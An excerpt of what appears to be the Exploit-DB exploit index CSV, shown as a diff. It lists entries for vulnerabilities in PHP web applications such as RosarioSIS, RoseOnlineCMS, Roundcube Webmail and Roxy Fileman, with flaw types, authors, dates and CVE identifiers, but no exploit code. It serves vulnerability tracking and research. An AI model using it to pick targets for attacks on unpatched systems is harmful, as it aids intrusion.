8797,exploits/php/webapps/8797.txt,"roomphplanning 1.6 - Multiple Vulnerabilities",2009-05-26,"ThE g0bL!N",webapps,php,,2009-05-25,2016-12-02,1,OSVDB-62791;CVE-2009-4671;OSVDB-54772;CVE-2009-4670;OSVDB-54771;CVE-2009-4669;OSVDB-54770;OSVDB-54769,,,,http://www.exploit-db.comrp_1.6.zip,
51622,exploits/php/webapps/51622.txt,"RosarioSIS 10.8.4 - CSV Injection",2023-07-28,"Ranjeet Jaiswal",webapps,php,,2023-07-28,2023-07-31,1,CVE-2023-29918,,,,,
52169,exploits/php/webapps/52169.txt,"RosarioSIS 7.6 - SQL Injection",2025-04-11,CodeSecLab,webapps,php,,2025-04-11,2025-04-11,0,CVE-2021-44567,,,,,
10793,exploits/php/webapps/10793.txt,"RoseOnlineCMS 3 B1 - 'admin' Local File Inclusion",2009-12-30,cr4wl3r,webapps,php,,2009-12-29,,1,OSVDB-61563;CVE-2009-4581,,,,,
11158,exploits/php/webapps/11158.txt,"RoseOnlineCMS 3 B1 - Remote Authentication Bypass",2010-01-16,cr4wl3r,webapps,php,,2010-01-15,,1,,,,,http://www.exploit-db.comRoseOnlineCMS_v3_b1.rar,
3548,exploits/php/webapps/3548.pl,"RoseOnlineCMS 3 beta2 - 'op' Local File Inclusion",2007-03-23,GoLd_M,webapps,php,,2007-03-22,2016-09-30,1,OSVDB-38601;CVE-2007-1636,,,,http://www.exploit-db.comRoseOnlineCMS_v3_B1.rar,
@ -29177,6 +29201,7 @@ id,file,description,date_published,author,type,platform,port,date_added,date_upd
20549,exploits/php/webapps/20549.py,"Roundcube Webmail 0.8.0 - Persistent Cross-Site Scripting",2012-08-16,"Shai rod",webapps,php,,2012-08-16,2012-08-16,1,CVE-2012-4668;CVE-2012-3508;OSVDB-85142;OSVDB-84741,,,,http://www.exploit-db.comroundcubemail-0.8.0.tar.gz,
39245,exploits/php/webapps/39245.txt,"Roundcube Webmail 1.1.3 - Directory Traversal",2016-01-15,"High-Tech Bridge SA",webapps,php,80,2016-01-15,2016-12-28,0,CVE-2015-8770;OSVDB-132194,,,,http://www.exploit-db.comroundcubemail-1.1.3-complete.tar.gz,https://www.htbridge.com/advisory/HTB23283
49510,exploits/php/webapps/49510.py,"Roundcube Webmail 1.2 - File Disclosure",2021-02-01,stonepresto,webapps,php,,2021-02-01,2021-02-01,0,,,,,,
52173,exploits/php/webapps/52173.txt,"Roundcube Webmail 1.6.6 - Stored Cross Site Scripting (XSS)",2025-04-11,AmirZargham,webapps,php,,2025-04-11,2025-04-11,0,CVE-2024-37383,,,,,
39963,exploits/php/webapps/39963.txt,"Roxy Fileman 1.4.4 - Arbitrary File Upload",2016-06-16,"Tyrell Sassen",webapps,php,80,2016-06-16,2016-06-16,0,,,,,http://www.exploit-db.comRoxyFileman-1.4.4-php.zip,
46172,exploits/php/webapps/46172.txt,"Roxy Fileman 1.4.5 - Arbitrary File Download",2019-01-16,"Ihsan Sencan",webapps,php,80,2019-01-16,2019-01-16,0,,,,,http://www.exploit-db.comRoxyFileman-1.4.5-php.zip,
46085,exploits/php/webapps/46085.txt,"Roxy Fileman 1.4.5 - Unrestricted File Upload / Directory Traversal",2019-01-07,"Pongtorn Angsuchotmetee_ Vittawat Masaree",webapps,php,80,2019-01-07,2019-01-07,0,CVE-2018-20526;CVE-2018-20525,Traversal,,,http://www.exploit-db.comRoxyFileman-1.4.5-php.zip,

Can't render this file because it is too large.